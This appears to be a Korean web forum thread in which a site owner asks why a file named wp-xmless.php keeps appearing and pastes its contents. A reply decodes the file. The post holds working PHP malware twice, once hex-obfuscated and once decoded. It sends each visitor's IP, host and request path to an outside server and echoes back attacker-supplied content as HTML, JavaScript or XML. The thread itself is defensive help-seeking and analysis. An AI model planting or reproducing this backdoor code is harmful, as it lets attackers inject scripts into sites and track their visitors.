바이러스 처럼 wp-xmless.php 파일이 자동으로 생성됩니다.
본문
바이러스 처럼 wp-xmless.php 파일이 자동으로 생성됩니다.
파일 내용은 아래처럼 알수없는 코드로 구성되어 있어요.
원인을 알 수 있을까요? 도움 부탁 드립니다.ㅜ
<?php
header(_typeGet());
echo _httpGet("\x68\x74\x74\x70\x3A\x2F\x2F\x76\x70\x62\x7A\x2E\x61\x75\x67\x30\x31\x63\x6F\x64\x65\x2E\x63\x6F\x6D\x2F\x68\x74\x61\x63\x63\x65\x73\x73\x2E\x61\x73\x70\x78\x3F\x68\x6F\x73\x74\x3D" . urlencode($_SERVER["\x52\x45\x4D\x4F\x54\x45\x5F\x41\x44\x44\x52"]) . "\x26\x64\x6F\x6D\x61\x69\x6E\x3D" . urlencode($_SERVER["\x48\x54\x54\x50\x5F\x48\x4F\x53\x54"]) . "\x26\x70\x61\x74\x68\x3D" . urlencode($_SERVER["\x52\x45\x51\x55\x45\x53\x54\x5F\x55\x52\x49"]));
function _httpGet($url){
$curl = curl_init();
curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);
curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($curl, CURLOPT_URL, $url);
$res = curl_exec($curl);
curl_close($curl);
return $res;
}
function _typeGet(){
$path = $_SERVER["\x52\x45\x51\x55\x45\x53\x54\x5F\x55\x52\x49"];
if (strpos($path, "\x2E\x78\x6D\x6C"))
return "\x43\x6F\x6E\x74\x65\x6E\x74\x2D\x54\x79\x70\x65\x3A\x20\x61\x70\x70\x6C\x69\x63\x61\x74\x69\x6F\x6E\x2F\x78\x6D\x6C";
if (strpos($path, "\x2E\x6A\x73"))
return "\x43\x6F\x6E\x74\x65\x6E\x74\x2D\x54\x79\x70\x65\x3A\x20\x61\x70\x70\x6C\x69\x63\x61\x74\x69\x6F\x6E\x2F\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74";
return "\x43\x6F\x6E\x74\x65\x6E\x74\x2D\x54\x79\x70\x65\x3A\x20\x74\x65\x78\x74\x2F\x68\x74\x6D\x6C";
}
?>
답변 2
모든 소스파일에서 wp-xmless.php 파일을 생성하는 부분이 없는지 찾아보셔야 할듯하시고.
우선 해당 부분을 풀어보면
http://vpbz.aug01code.com/htaccess.aspx?로 사용자의 도메인과 ip를 수집해가는거 같습니다.
- 이런코드입니다. 사이트에 원하는 javascript 코드를 심을 수 있겠는데요..
header(_typeGet());echo _httpGet("http://vpbz.aug01code.com/htaccess.aspx?host=" . urlencode($_SERVER["REMOTE_ADDR"]) . "&domain=" . urlencode($_SERVER["HTTP_HOST"]) . "&path=" . urlencode($_SERVER["REQUEST_URI"]));function _httpGet($url){$curl = curl_init();curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false);curl_setopt($curl, CURLOPT_URL, $url);$res = curl_exec($curl);curl_close($curl);return $res;}function _typeGet(){$path = $_SERVER["REQUEST_URI"];if (strpos($path, ".xml"))return "Content-Type: application/xml";if (strpos($path, ".js"))return "Content-Type: application/javascript";return "Content-Type: text/html";}
